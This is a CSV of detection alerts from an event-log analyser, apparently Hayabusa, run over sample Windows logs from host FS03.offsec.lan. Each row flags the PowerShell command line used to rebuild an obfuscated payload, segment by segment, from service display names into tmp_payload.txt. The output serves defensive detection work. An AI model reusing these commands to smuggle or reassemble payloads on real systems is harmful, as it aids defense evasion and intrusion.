2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x28c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:00.089 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:00.104 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:03.010 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:03.026 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:05.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:05.911 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:14.607 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:14.623 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:16.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:16.080 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:17.549 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:17.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:29.330 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:29.346 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
